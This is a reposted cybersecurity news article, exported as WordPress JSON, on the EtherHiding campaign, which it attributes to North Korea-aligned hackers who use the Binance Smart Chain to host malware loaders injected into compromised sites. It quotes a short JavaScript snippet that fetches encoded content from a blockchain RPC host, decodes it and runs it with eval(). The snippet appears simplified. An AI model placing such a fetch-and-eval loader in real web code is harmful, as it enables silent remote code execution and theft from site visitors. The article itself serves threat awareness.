{"id":7744,"date":"2025-10-17T10:03:55","date_gmt":"2025-10-17T10:03:55","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/17\/north-korean-hackers-using-etherhiding-to-deliver-malware-and-steal-cryptocurrency\/"},"modified":"2025-10-17T10:03:55","modified_gmt":"2025-10-17T10:03:55","slug":"north-korean-hackers-using-etherhiding-to-deliver-malware-and-steal-cryptocurrency","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/17\/north-korean-hackers-using-etherhiding-to-deliver-malware-and-steal-cryptocurrency\/","title":{"rendered":"North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency"},"content":{"rendered":"<p>    North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>In recent months, a sophisticated malware campaign\u2014dubbed EtherHiding\u2014has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide.<\/p>\n<p>The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics to exploit new digital supply chain vulnerabilities.<\/p>\n<p>EtherHiding first appeared in targeted phishing campaigns, but has since evolved into a multi-stage threat, marked by its use of decentralized blockchain technologies to distribute and update malicious payloads stealthily.<\/p>\n<p>The signature tactic distinguishing EtherHiding lies in its exploitation of the Binance Smart Chain (BSC) to host intermediary scripts, thereby circumventing traditional security controls and enabling the campaign to persist even after domains or hosting providers are taken down.<\/p>\n<p>Attackers compromise legitimate or <a href=\"https:\/\/cybersecuritynews.com\/100-fake-web-stores-steal-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">semi-legitimate websites<\/a>, injecting code that reaches out to blockchain-stored content to fetch the latest stage of malware.<\/p>\n<p>This modular approach grants the operators a high degree of agility, allowing on-the-fly updates to malicious scripts and reducing the effectiveness of traditional blocklists or take-down requests.<\/p>\n<p>Google Cloud researchers <a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-adopts-etherhiding\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> and documented EtherHiding\u2019s operation, highlighting its innovative use of cryptographic anonymity provided by blockchain networks, making forensic tracking and operational disruption significantly more challenging for defenders.<\/p>\n<p>The impact of EtherHiding has been severe, enabling not only the theft of digital assets but also establishing persistent access to infected systems for further espionage or ransomware activity.<\/p>\n<p>As the campaign evolved, it began to target browser extensions, hot wallets, and even popular DeFi platforms, broadening the spectrum of potential victims.<\/p>\n<p>The campaign\u2019s ability to iterate and redeploy new infection chains has frustrated enterprise defenders, with many legacy <a href=\"https:\/\/cybersecuritynews.com\/best-endpoint-protection-solutions-for-msps-mssps\/\" target=\"_blank\" rel=\"noreferrer noopener\">endpoint security solutions<\/a> failing to keep pace with the dynamic delivery infrastructure leveraged by North Korean operators.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEidGL4eIDeJqfabWILgIsImr2z9XgfSk7Ho4LMg0BviIh1aFr9W4Hu-ahnHMzdsjDMIz5N0Pl4y7HRhCqDS8ZN2h0JRZJTZmliPGyX8TqyZbInhVnLbO8vzrhi-d94Av4fueo0Xn0Vj6rxluo_2z_xmoEYc9ioeSxMoTRmZ4VGUTTuRhkVH0EEsocYx4rE\/s16000\/UNC5342%2520EtherHiding%2520on%2520BNB%2520Smart%2520Chain%2520and%2520Ethereum%2520%28Source%2520-%2520Google%2520Cloud%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source \u2013 Google Cloud)<\/figcaption><\/figure>\n<\/div>\n<p>Cryptocurrency platforms are under renewed pressure to audit their web and cloud assets, as even a minor misconfiguration can open pathways for EtherHiding\u2019s injection and subsequent exploitation.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-and-javascript-payloads\"><strong>Infection Mechanism and JavaScript Payloads<\/strong><\/h2>\n<p>The infection chain typically begins with JavaScript injected into vulnerable web properties. This script silently loads additional code from the Binance Smart Chain using unique transaction identifiers.<\/p>\n<p>The payload mechanism relies on <a href=\"https:\/\/cybersecuritynews.com\/malware-obfuscation\/\" target=\"_blank\" rel=\"noreferrer noopener\">obfuscation<\/a> and multi-layer encoding, making static detection increasingly difficult.<\/p>\n<p>For instance, base64-encoded loader scripts are fetched and then executed within the browser context, occasionally using iframes or manipulated event handlers to deliver the next stage payload.<\/p>\n<p>A representative code snippet demonstrates the loader\u2019s logic:-<\/p>\n<pre class=\"wp-block-code\"><code>fetch('https:\/\/bsc-dataseed.binance.org\/')\n  .then(response =&gt; response.json())\n  .then(data =&gt; {\n    let scriptContent = atob(data.result);\n    eval(scriptContent);\n  });<\/code><\/pre>\n<p>Such tactics not only obscure the origin of the malicious payload but also enable rapid code updates.<\/p>\n<p>As detection mechanisms adapt, <a href=\"https:\/\/cybersecuritynews.com\/etherhiding-a-novel-technique-to-hide-malicious-code\/\" target=\"_blank\" rel=\"noreferrer noopener\">EtherHiding<\/a> operators push new payloads to the blockchain, decoupling the infection infrastructure from easy takedown and providing a resilient attack platform for ongoing theft and intrusion operations.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/north-korean-hackers-using-etherhiding\/\">North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/north-korean-hackers-using-etherhiding\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency In recent months, a sophisticated malware campaign\u2014dubbed EtherHiding\u2014has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide. The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7744","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7744"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7744"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7744\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}